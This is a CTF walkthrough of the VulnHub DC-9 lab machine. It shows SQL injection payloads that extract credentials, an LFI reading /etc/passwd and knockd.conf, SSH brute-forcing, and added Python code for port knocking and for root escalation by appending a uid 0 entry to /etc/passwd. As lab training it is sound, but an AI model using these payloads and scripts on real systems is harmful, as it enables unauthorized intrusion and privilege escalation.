Vulnhub-DC 9

ARZ101
6 min read · May 16, 2021

This is a walkthrough of DC-9 from the DC VulnHub series. The box was a real challenge: SSH shows up as filtered, the admin hash comes out through SQL injection, logging in with it exposes an LFI parameter that reveals the port-knocking sequence, and dumping the second database gives a password list to brute-force SSH with.

NMAP

nmap -sC -sV 192.168.1.7
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-16 09:31 PKT
Nmap scan report for 192.168.1.7
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 08:00:27:1B:8F:38 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Going to Display All Records shows the details of the staff users.

There is also a login page, so let's try some basic SQLi against it.

I tried admin' or 1=1 # and admin' or 1=1 -- , but both failed.

search.php searches by name, so let's supply mary, since a record for that user exists.

Now run the query mary' and 1=1 # and see whether it still returns mary's record.

It does, so the parameter is injectable. Before extracting anything we need to know how many columns the original query selects. order by <number> sorts by the column at that position, so we keep increasing the number until the query errors out and we get no response:

mary' order by 1 #

I kept getting results up to order by 6, but order by 7 returned nothing.

So the query has 6 columns and we can build a union-based injection:

mary' union select version(),user(),database(),4,5,6 #

The server is MariaDB, the application connects as dbuser, and the current database is Staff. Next we need the table names, then the column names, and then the data itself.

First, a query that lists every database on the server:

mary' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata #

There are two databases; for now let's focus on Staff and list its tables:

mary' union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database() #

There are two tables, StaffDetails and Users, so let's list the column names of Users:

mary' union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name='Users' #

We have the column names; username and password are the interesting ones, so let's extract those.

That gives us the admin username and password hash. The same thing could have been done with sqlmap by intercepting the search.php request, saving it to a file and handing that file to sqlmap.

Let's look the hash up on CrackStation.

As soon as we log in with the recovered credentials we get an error on the page.

I tried a file parameter and got the contents of /etc/passwd, so we have a local file inclusion.

I copied the output to a file and pulled out the usernames only (the first colon-separated field).

Now remember that we had two databases, Staff and users; let's use sqlmap to dump the users database as well.

The usernames are already saved, so let's grab the passwords too and start brute forcing SSH.

But SSH is filtered, so first we use the LFI to check whether a port-knocking configuration exists; knockd reads its sequences from /etc/knockd.conf by default.

With the sequence in hand we can port-knock to open the SSH port.
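An added example of the two steps just described, parsing a knockd-style configuration as it would be read through the LFI and then replaying the sequence against the target; this is not the page's code. SAMPLE_CONF is a constructed file in knockd.conf syntax whose ports are the example values from the knockd manual, not DC-9's real sequence, and HOST is a placeholder for the target address.

```python
import socket
import time

# Constructed knockd.conf in the stock format; the ports are the manual's example values.
SAMPLE_CONF = """\
[options]
    UseSyslog

[openSSH]
    sequence    = 7000,8000,9000
    seq_timeout = 5
    command     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9000,8000,7000
    seq_timeout = 5
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""

def parse_knock_sequences(conf_text):
    """Return {section: [(port, proto), ...]} for every section that has a 'sequence' key.
    knockd accepts 'port' or 'port:proto' entries; proto defaults to tcp."""
    sequences, section = {}, None
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # '#' starts a comment in knockd.conf
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if "=" in line and section:
            key, value = (s.strip() for s in line.split("=", 1))
            if key.lower() == "sequence":
                seq = []
                for item in value.split(","):
                    port, _, proto = item.strip().partition(":")
                    seq.append((int(port), (proto or "tcp").lower()))
                sequences[section] = seq
    return sequences

def knock(host, sequence, delay=0.5, timeout=1.0):
    """Send one packet per entry, in order. For tcp a connect attempt is enough: the SYN
    is what knockd matches, so the refused connection that follows is expected. For udp
    a single empty datagram is sent. The delay keeps the knocks inside seq_timeout
    while staying well apart on the wire."""
    for port, proto in sequence:
        if proto == "udp":
            with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
                s.sendto(b"", (host, port))
        else:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                s.connect_ex((host, port))   # result ignored; refusal is the normal case
        time.sleep(delay)

def ssh_open(host, timeout=2.0):
    """True when a TCP handshake to port 22 now completes."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, 22)) == 0

if __name__ == "__main__":
    HOST = "192.168.1.7"   # placeholder: the page's target address, adjust for your lab
    seqs = parse_knock_sequences(SAMPLE_CONF)
    knock(HOST, seqs["openSSH"])
    print("ssh reachable after knock:", ssh_open(HOST))
```

If the knock appears not to work, check the real file for a tcpflags or seq_timeout setting and for udp entries: a sequence sent too slowly, or with the wrong protocol, is silently ignored by knockd.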

Brute forcing found 2 valid passwords.

After logging in as janitor we find more passwords on the box.

Let's add those to the password list and brute force again.

Switching to fredf, we find that this user can run the file test with sudo.

It's a binary, so let's execute it and see what happens.

Oddly, it mentions test.py, a Python script that reads one file and appends to another, so we need to find that script.

And we found it.

Reading the source, it takes two file arguments: it reads the contents of the first, stores them in a variable, and appends them to the second. Since it runs as root through sudo and does not restrict either path, we can write a passwd entry for a new uid 0 user (with a valid password hash) to a file of our own and use the script to append that file to /etc/passwd.

Now let's check whether that actually worked.

The user was added, so we can switch to it and become root.
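The privilege-escalation primitive described above as an added example, exercised against temporary files rather than the real /etc/passwd; this is not the page's code, and append_file() is an assumed reconstruction of the behaviour the page attributes to test.py, which is only described in prose here. The hash in run_on_temp_copy() is a placeholder: generate a real one with `openssl passwd -6 <password>` before using the line on a target.

```python
import os
import tempfile

def append_file(src, dst):
    """Assumed behaviour of the sudo-able test.py: read src, append it to dst.
    No path check, so dst can be /etc/passwd when this runs as root."""
    with open(src) as f:
        data = f.read()
    with open(dst, "a") as f:
        f.write(data)

def make_passwd_entry(user, pw_hash, uid=0, gid=0, gecos="", home="/root", shell="/bin/bash"):
    """Build one /etc/passwd record: exactly 7 colon-separated fields, uid 0 for root.
    A stray ':' or newline in any field would corrupt the file, so refuse them."""
    for field in (user, pw_hash, gecos, home, shell):
        if ":" in field or "\n" in field:
            raise ValueError("field would corrupt the passwd record")
    return f"{user}:{pw_hash}:{uid}:{gid}:{gecos}:{home}:{shell}\n"

def parse_passwd(text):
    """Parse passwd-format text into (user, uid, shell) tuples, skipping malformed lines.
    Used to confirm the appended record is well formed before trying to switch user."""
    out = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        try:
            out.append((parts[0], int(parts[2]), parts[6]))
        except ValueError:
            continue
    return out

def add_root_user(passwd_path, new_user, pw_hash):
    """The chain from the page: stage the entry in our own file, then have the
    root-run helper append that file onto passwd_path."""
    with tempfile.NamedTemporaryFile("w", delete=False) as staging:
        staging.write(make_passwd_entry(new_user, pw_hash))
    try:
        append_file(staging.name, passwd_path)
    finally:
        os.unlink(staging.name)
    with open(passwd_path) as f:
        return parse_passwd(f.read())

def run_on_temp_copy():
    """Run the chain against a constructed passwd file, never the real one."""
    with tempfile.NamedTemporaryFile("w", delete=False) as fake_passwd:
        fake_passwd.write("root:x:0:0:root:/root:/bin/bash\n"
                          "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n")
    try:
        return add_root_user(fake_passwd.name, "toor", "PLACEHOLDER_HASH")  # placeholder hash
    finally:
        os.unlink(fake_passwd.name)

if __name__ == "__main__":
    for user, uid, shell in run_on_temp_copy():
        print(user, uid, shell)
```

Parsing the file back after the append is the check worth keeping: if the staged file was missing its trailing newline, or the helper appended onto a line that had none, the new record fuses with the previous one and the switch to the new user fails with no useful error.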
